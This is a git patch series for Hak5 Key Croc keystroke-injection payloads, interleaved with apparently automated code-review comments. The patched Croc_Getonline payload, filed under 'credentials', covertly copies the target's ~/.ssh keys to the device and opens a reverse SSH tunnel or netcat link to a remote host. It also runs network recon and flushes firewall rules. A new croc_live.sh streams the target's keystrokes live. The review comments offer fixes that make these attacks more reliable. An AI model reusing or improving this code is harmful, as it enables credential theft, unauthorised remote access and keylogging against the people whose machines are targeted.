+ - ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) -( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) - -* **RECON SCAN OPTION** +* **Configuring RECON scan with recon=on andrecon=off** The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. @@ -81,6 +79,19 @@ The options recon=off and recon=on play a key role in performing basic recon sca - Initiates basic network reconnaissance scans. - Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt. +* **Configuring ICMP and Port Alerts with alert=on and alert=off** + +- **`alert=on`** + + - ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules. + - Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules. + +- **`alert=off`** + + - If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up. + +To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts. + ## PAYLOAD INFO : - **PowerShell script that performs the following actions:** 
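Review bot: the heading "Configuring RECON scan with recon=on andrecon=off" (hunk @@ -45,29 +47,25 @@) is missing the space in "and recon=off", and the summary paragraph added in the alert section (hunk @@ -81,6 +79,19 @@) has no verb: "To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions" should read "To summarize, when alert=on the script sets up ICMP and port alerts using the icmp_alert() and port_alert() functions". The alert bullets also hard-code "for a minute" although the payload exposes the duration as `alert_time=60`; say "for `alert_time` seconds (default 60)". The section should also tell the reader that a running alert is stopped with the new `getonline_T` MATCH word.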
@@ -130,4 +141,4 @@ s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. -s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. +s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. From 19f2907265a166dbd96cfc9440611f4dbeb4c687 Mon Sep 17 00:00:00 2001 From: spywill Date: Sat, 22 Jul 2023 08:46:14 -0400 Subject: [PATCH 4/9] Update Croc_getonline.txt minor changes added ICMP and Port Alerts --- .../Croc_Getonline/Croc_getonline.txt | 118 +++++++++++++----- 1 file changed, 89 insertions(+), 29 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 64f18cf..20782bd 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt @@ -2,7 +2,7 @@ # Description: Attempt to connect Keycroc automatically to target wifi access point # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 4.1 +# Version: 4.2 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro @@ -17,6 +17,7 @@ # getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL # getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET # getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot +# getonline_T <-- MATCH word for Stopping ICMP/PORT alert MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) QUACK LOCK 
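Review bot: the hunk at @@ -17,6 +17,7 @@ adds the `# getonline_T` comment but leaves the `MATCH (getonline_W|...|getonline_X)` context line unchanged, so typing getonline_T never triggers the payload and the `getonline_T)` case added later in this patch is unreachable; append `|getonline_T` to the MATCH pattern.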
@@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE recon=off recon_loot=/root/udisk/tools/Target_SSID.txt -#---> Edit Linux target password below +alert=off +alert_time=60 + +#---> Edit target password below if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) else - target_password=ENTER_LINUX_PASSWORD_HERE + target_password=ENTER_TARGET_PASSWORD_HERE fi recon_scan() { @@ -53,10 +57,16 @@ recon_scan() { QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 + QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" + QUACK ENTER + QUACK DELAY 2000 elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 + QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :" + QUACK ENTER + QUACK DELAY 2000 else : fi @@ -103,6 +113,14 @@ CLEAN_UP() { fi } +calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" +} + case $LOOT in getonline_W) ENTER_STORAGE 
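Review bot: `calculate_network_range()` (hunk @@ -103,6 +113,14 @@) now reads the address with `grep "inet addr" | awk '{print $2}' | cut -c 6-`, which only matches the older net-tools output (`inet addr:10.0.0.5`); the expression it replaces, `'inet (addr:)?([0-9]*\.){3}[0-9]*'`, accepted both that and the newer `inet 10.0.0.5` form, and the netmask line below it still accepts both `Mask:` and `netmask`, so keep the old expression or switch to `ip -4 -o addr show wlan0`. The function also always emits `.0/24` whatever mask it read, so `$network_range` is wrong for anything other than a /24; either apply `$((i4 & m4))` and derive the prefix length from the mask, or document the /24 assumption. In hunk @@ -53,10 +57,16 @@, `New-Item -ItemType Directory -Path $destination` creates a directory named `Target_SSH_KEY.txt`; drop the `.txt` suffix.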
@@ -220,6 +238,22 @@ case $LOOT in rm -f $recon_loot root/udisk/config.txt apt -y remove sshpass reboot --force + RESET_PAYLOAD +;; + getonline_T) + if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/port_pid.txt)" + fi + if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)" + fi + killall -9 tcpdump + sleep 1 + else + : + fi + RESET_PAYLOAD ;; esac sleep 3 @@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then QUACK ENTER elif [ $option -eq 2 ]; then status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" - if [ ! $? = 0 ] || [ ! "$status" = installed ]; then - apt -y install sshpass - else - : - fi + [ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass sleep 1 if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then - cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null - rm -rf ~/.ssh 2>/dev/null - ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa - sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa sleep 1 + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 3 ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip else LED R @@ -324,10 +353,6 @@ else LED R fi -sleep 3 -LED OFF -QUACK UNLOCK - if [ "$recon" = "on" ]; then LED C SLOW echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot 
@@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot cat /etc/resolv.conf | grep nameserver >> $recon_loot - echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot - calculate_network_range() { - ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') - netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') - IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" - IFS=. read -r m1 m2 m3 m4 <<< "$netmask" - network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" - echo "$network_range" - } perform_nmap_scan() { - local network_range=$1 + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot nmap -T4 -F $network_range >> $recon_loot } - network_range=$(calculate_network_range) - perform_nmap_scan $network_range + calculate_network_range + perform_nmap_scan echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot echo -ne "\n\n" >> $recon_loot - LED OFF elif [ "$recon" = "off" ]; then : else : fi + +if [ "$alert" = "on" ]; then + icmp_alert() { + calculate_network_range + sleep 1 + until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do + : + done + LED R SLOW + iptables -F + iptables -A OUTPUT -p icmp --icmp-type any -j DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + icmp_alert & echo 
-ne $! > /tmp/icmp_pid.txt + } + port_alert() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + file=/tmp/tcpdump.out + until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do + : + done + LED R SLOW + iptables -F + iptables -P INPUT DROP + iptables -P OUTPUT DROP + iptables -P FORWARD DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + port_alert & echo -ne $! > /tmp/port_pid.txt + } + iptables-save > /root/udisk/tools/firewall-rules-backup.txt + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + port_alert & echo -ne $! > /tmp/port_pid.txt + LED B +elif [ "$alert" = "off" ]; then + : +else + : +fi + +sleep 3 +LED OFF +QUACK UNLOCK From 6e08132c37bae501c2eabfa7a7aae71b64f413c3 Mon Sep 17 00:00:00 2001 From: spywill Date: Fri, 28 Jul 2023 06:47:54 -0400 Subject: [PATCH 5/9] Update README.md minor changes --- payloads/library/credentials/Croc_Getonline/README.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 4382462..7153625 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md 
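Review bot: the new `getonline_T` MATCH word in the @@ -17,6 +17,7 hunk of PATCH 4/9 is only added to the header comment; the `MATCH (getonline_W|...|getonline_X)` line directly below it is unchanged context, so the `getonline_T)` case added later in this patch can never be reached. Add `|getonline_T` to the alternation (or move to a pattern that covers every suffix, as PATCH 6/9 later does).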
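Review bot: the new `alert=off` and `alert_time=60` settings in the @@ -40,11 +41,14 hunk get no `#---> Edit ...` comment, unlike `recon` right above them, and nothing states that `alert_time` is in seconds and is how long the firewall lockdown lasts. Add a comment such as `#---> Edit ICMP/PORT alert on/off below & iptables time out (seconds)`.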
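Review bot: in the @@ -53,10 +57,16 hunk the SSH-key copy writes into a path named `Target_SSH_KEY.txt` that is created as a directory (`New-Item -ItemType Directory`, `cp -fr ~/.ssh/.`), so the `.txt` suffix is misleading; drop it. This copy of `~/.ssh` is also not mentioned in the commit message ("added ICMP and Port Alerts"), in the `# Save to ...` header comment, or in the README, so document what the recon option now collects. In the PowerShell branch `else { \$false }` only prints `False` to the console and can be removed.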
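Review bot: `calculate_network_range()` in the @@ -103,6 +113,14 hunk reads the address with `grep "inet addr"` followed by `cut -c 6-`, which only matches the old net-tools `inet addr:` layout, while the `netmask` line right below still accepts both `Mask:` and `netmask` forms; the function body removed in the @@ -337,28 +362,63 hunk handled both forms for the address as well (`grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*'`), so this is a regression on hosts whose `ifconfig` prints `inet 10.0.0.5`. Keep the regex form. Separately, the netmask is parsed but the result is still hard-coded to `.0/24` (`$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24`); either derive the prefix length from the mask or drop the netmask parsing.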
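Review bot: the `getonline_T)` case in the @@ -220,6 +238,22 hunk runs `ps -p "$(sed -n 1p /tmp/port_pid.txt)"` before checking that either pid file exists, so on first use (or after a reboot) both `sed` and `ps` error out on an empty argument. Test `[ -f /tmp/port_pid.txt ]` first, try plain `kill` before `kill -9`, and remove the pid files afterwards so a second `getonline_T` does not act on stale ids. `killall -9 tcpdump` also kills any `tcpdump` the payload did not start. The `RESET_PAYLOAD` added after `reboot --force` in `getonline_X)` is unreachable.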
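Review bot: the one-liner in the @@ -292,18 +326,13 hunk inverts the install condition. The removed block installed `sshpass` when the `dpkg-query` call failed OR `$status` was not `installed`; `[ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass` skips the install when the query succeeded OR the status is `installed`, so a package that `dpkg-query` knows but reports as `not-installed` or `config-files` (exit status 0) is never installed. Write it as `[ $? = 0 ] && [ "$status" = installed ] || apt -y install sshpass`. In the same hunk `[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen ...` reads more clearly as `[ -f ~/.ssh/id_rsa.pub ] || ssh-keygen ...`.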
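Review bot: removing `sleep 3` / `LED OFF` / `QUACK UNLOCK` in the @@ -324,10 +353,6 hunk and re-adding them at the end of the file means the target keyboard now stays locked while the whole `recon=on` block (the `nmap` scan and the two `curl` calls) runs, which was not the case before. If that is intended, say so in the commit message and README; otherwise keep the unlock ahead of the recon block.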
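Review bot: the `icmp_alert` and `port_alert` loops in the @@ -337,28 +362,63 hunk use `until (tcpdump ...); do : done`, but `tcpdump -c N` exits 0 once it has captured N packets and non-zero only on error (for example when `wlan0` is down), and the `icmp_alert` pipeline ends in `sed`, whose status is always 0; so each `until` either runs once or spins at full CPU on a persistent error. Run `tcpdump` once and check its output, or add a `sleep` inside the loop. In `port_alert`, `-c 20` counts every inbound SYN from any host with no time window (`-G 10` only rotates the `-w` file), so ordinary traffic, including connections arriving over the reverse SSH tunnel set up under `option=2`, will trip it; when it trips, `iptables -F` followed by `-P INPUT/OUTPUT/FORWARD DROP` cuts the KeyCroc's own SSH session and tunnel for `$alert_time` seconds. The later `iptables-restore < /root/udisk/tools/firewall-rules-backup.txt` should be guarded with `[ -f ... ]`, `icmp_alert` lacks the `-i wlan0` that `port_alert` passes, and the `elif [ "$alert" = "off" ]; then : else : fi` branches are empty and can be dropped.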
@@ -65,7 +65,12 @@ Editing payload variable options: - This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. - ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) -* **Configuring RECON scan with recon=on andrecon=off** +- **`option=4`** + + - This option will run payload as normal, after a successful connection open default browser and start web page. + - ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org ) + +* **Configuring RECON scan with recon=on and recon=off** The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. @@ -141,4 +146,4 @@ s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. -s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. +s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. From 3743f48375f0c4ad5cae400bfc795612de93e691 Mon Sep 17 00:00:00 2001 From: spywill Date: Fri, 28 Jul 2023 06:50:39 -0400 Subject: [PATCH 6/9] Update Croc_getonline.txt minor changes added starting default browser on target --- .../Croc_Getonline/Croc_getonline.txt | 68 +++++++++++++++---- 1 file changed, 56 insertions(+), 12 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 20782bd..c80cb60 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt 
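Review bot: the `option=4` entry added in the @@ -65,7 +65,12 hunk names the default as `https://forums.hak5.org`, while the payload's `# option=4 Run payload as normal, open web page` comment and `web_page=https://forums.hak5.org/` use a trailing slash; keep README and payload identical so the "EDIT PAYLOAD FOR WEB SITE" hint points at the exact value. The fix of "andrecon" to "and recon" is fine.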
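Review bot: the @@ -141,4 +146,4 hunk changes no visible text (the `s/\n\S+//` explanation is identical on the `-` and `+` sides); it is the end-of-file newline being toggled again, exactly as in the @@ -130,4 +141,4 hunk at the start of this series. Commit the README with one trailing newline so every later edit stops producing this hunk.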
@@ -2,7 +2,7 @@ # Description: Attempt to connect Keycroc automatically to target wifi access point # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 4.2 +# Version: 4.3 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro @@ -19,13 +19,20 @@ # getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot # getonline_T <-- MATCH word for Stopping ICMP/PORT alert -MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) +# option=0 Run payload as normal +# option=1 Run payload as normal, open terminal on target +# option=2 Run payload as normal, start reverse SSH tunnel using SSH +# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT +# option=4 Run payload as normal, open web page + +MATCH getonline+_[A-Z]{1} QUACK LOCK #---> Edit payload option below option=0 keycroc_password=hak5croc wifi_pass=/tools/wifipass.txt +web_page=https://forums.hak5.org/ #---> Edit remote host below remote_user_name=EDIT_REMOTE_USERNAME_HERE @@ -37,10 +44,12 @@ port=7000 known_ssid=EDIT_KNOWN_SSID_HERE known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE -#---> Edit recon scan on/off below +#---> Edit recon scan on/off below & nmap recon=off +nmap_scan="nmap -T4 -F" recon_loot=/root/udisk/tools/Target_SSID.txt +#---> Edit ICMP/PORT alert on/off below & iptables time out alert=off alert_time=60 
@@ -57,14 +66,14 @@ recon_scan() { QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 - QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" + QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" QUACK ENTER QUACK DELAY 2000 elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 - QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :" + QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :" QUACK ENTER QUACK DELAY 2000 else @@ -211,31 +220,37 @@ case $LOOT in fi ;; getonline_K) - ifconfig wlan0 down LED R + ifconfig wlan0 down RESET_PAYLOAD ;; getonline_S) ATTACKMODE HID STORAGE + sleep 3 RESET_PAYLOAD ;; getonline_H) ATTACKMODE HID + sleep 3 RESET_PAYLOAD ;; getonline_P) ATTACKMODE HID SERIAL + sleep 3 RESET_PAYLOAD ;; getonline_A) ATTACKMODE HID AUTO_ETHERNET + sleep 3 RESET_PAYLOAD ;; getonline_X) LED R rm -f /root/udisk/payloads/Croc_getonline.txt - rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt + rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt rm -f $recon_loot root/udisk/config.txt + rm -f /root/udisk/tools/firewall-rules-backup.txt + rm -r /root/udisk/tools/Target_SSH_KEY apt -y remove sshpass reboot --force RESET_PAYLOAD 
@@ -254,6 +269,12 @@ case $LOOT in : fi RESET_PAYLOAD +;; + *) + LED R + sleep 1 + LED OFF + RESET_PAYLOAD ;; esac sleep 3 @@ -285,8 +306,8 @@ if [ "$LOOT" = "getonline_W" ]; then fi sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt +sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf ifconfig wlan0 up @@ -326,7 +347,7 @@ if : >/dev/tcp/8.8.8.8/53; then QUACK ENTER elif [ $option -eq 2 ]; then status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" - [ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass + [ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass sleep 1 if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa @@ -345,6 +366,29 @@ if : >/dev/tcp/8.8.8.8/53; then LED R sleep 1 fi + elif [ $option -eq 4 ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK GUI d + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Start-Process $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_R" ]; then + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_L" ]; then + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + fi else LED FINISH fi 
@@ -364,7 +408,7 @@ if [ "$recon" = "on" ]; then perform_nmap_scan() { echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot - nmap -T4 -F $network_range >> $recon_loot + $nmap_scan $network_range >> $recon_loot } calculate_network_range perform_nmap_scan @@ -382,7 +426,7 @@ if [ "$alert" = "on" ]; then icmp_alert() { calculate_network_range sleep 1 - until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do + until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do : done LED R SLOW From 0eb5e899be8afc789dba3ab42b69dba32d320cb6 Mon Sep 17 00:00:00 2001 From: spywill Date: Tue, 1 Aug 2023 08:22:17 -0400 Subject: [PATCH 7/9] Create croc_live.sh --- .../library/general/Croc_Live/croc_live.sh | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 payloads/library/general/Croc_Live/croc_live.sh diff --git a/payloads/library/general/Croc_Live/croc_live.sh b/payloads/library/general/Croc_Live/croc_live.sh new file mode 100644 index 0000000..6a0a14c --- /dev/null +++ b/payloads/library/general/Croc_Live/croc_live.sh @@ -0,0 +1,19 @@ +#!/bin/bash + +# Title: Croc_Live +# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh ) +# Author: spywill +# Version: 1.0 +# Category: Key Croc + +echo -ne "\n\nPrevious keystrokes:\n\n" +find . -type f -name "croc_char.log" -exec cat {} + + +until [ -f loot/croc_char.log ]; do + echo -ne "Waiting for keyboard activity\033[0K\r" +done +sleep 1 +printf '\033[H\033[2J' + +echo -ne "\n\nLive keystrokes:\n\n" +tail -f loot/croc_char.log From c6a76589da7351dd01a7e32ae2c2cdf38bdb9ab7 Mon Sep 17 00:00:00 2001 
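Review bot: the new pattern `MATCH getonline+_[A-Z]{1}` in the @@ -19,13 +19,20 hunk does not express what it is meant to: `+` binds only to the preceding `e`, so it matches `getonlin` followed by one or more `e`, then `_` and one capital letter (`getonlineee_W` matches too), and `{1}` is a no-op. `MATCH getonline_[A-Z]` is the intended pattern. The `# option=N` comments are a welcome addition.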
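Review bot: `nmap_scan="nmap -T4 -F"` in the @@ -37,10 +44,12 hunk is later expanded unquoted as `$nmap_scan $network_range` (@@ -364,7 +408,7 hunk), which relies on word splitting and breaks for any option containing spaces or quotes; a bash array (`nmap_scan=(nmap -T4 -F)` expanded as `"${nmap_scan[@]}"`) keeps the edit-one-variable convenience without that problem.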
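Review bot: renaming the loot directory to `Target_SSH_KEY` in the @@ -57,14 +66,14 hunk fixes the misleading `.txt` name, but the `# Save to ...` header comment at the top of the file still lists only `wifipass.txt`, `old_wifipass.txt` and `Target_SSID.txt`; add the new directory there. `Copy-Item -Path ~/.ssh\*` without `-Recurse` skips subdirectories, which differs from the Linux `cp -fr ~/.ssh/.`.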
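Review bot: in the `getonline_X)` cleanup of the @@ -211,31 +220,37 hunk, `rm -r /root/udisk/tools/Target_SSH_KEY` has no `-f`, so it prints an error whenever recon never created that directory; use `rm -rf`. The unchanged `rm -f $recon_loot root/udisk/config.txt` line next to it uses a relative `root/udisk/config.txt` (no leading `/`), which is only right if the payload runs with `/` as its working directory, while every other path in the file is absolute or `~`-relative. The `RESET_PAYLOAD` after `reboot --force` never runs.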
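Review bot: the @@ -285,8 +306,8 hunk bumps the hard-coded `config.txt` line numbers from 9/10/11 to 14/15/16, but the README text in PATCH 5/9 of this series still explains `11{..} executes the commands between the ellipses on the eleventh line of config.txt`; update the README to match and add a comment stating which `config.txt` layout those numbers assume. The same two `sed` lines address the file as `~/udisk/config.txt` and then as relative `root/udisk/config.txt`; make both absolute.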
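Review bot: `apt --force-yes install sshpass` in the @@ -326,7 +347,7 hunk replaces `-y` with an option apt has deprecated and that disables safety checks; keep `apt -y install sshpass` and, if a specific prompt is the problem, add the matching `--allow-*` flag. The condition on the same line still skips the install whenever `dpkg-query` exits 0 even when `$status` is `not-installed` (see the @@ -292,18 +326,13 hunk in PATCH 4/9); `[ $? = 0 ] && [ "$status" = installed ] || ...` is the intended logic.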
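Review bot: the `option=4` Windows branch in the @@ -345,6 +366,29 hunk types `Start-Process $web_page & exit` into `powershell`, which on the Windows 10 target listed as tested is Windows PowerShell 5.1; there a bare `&` between two statements is a parse error ("The ampersand (&) character is not allowed"), so nothing opens and the window stays up. Use `Start-Process $web_page; exit`. The Linux branches (`xdg-open $web_page & exit`) are fine.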
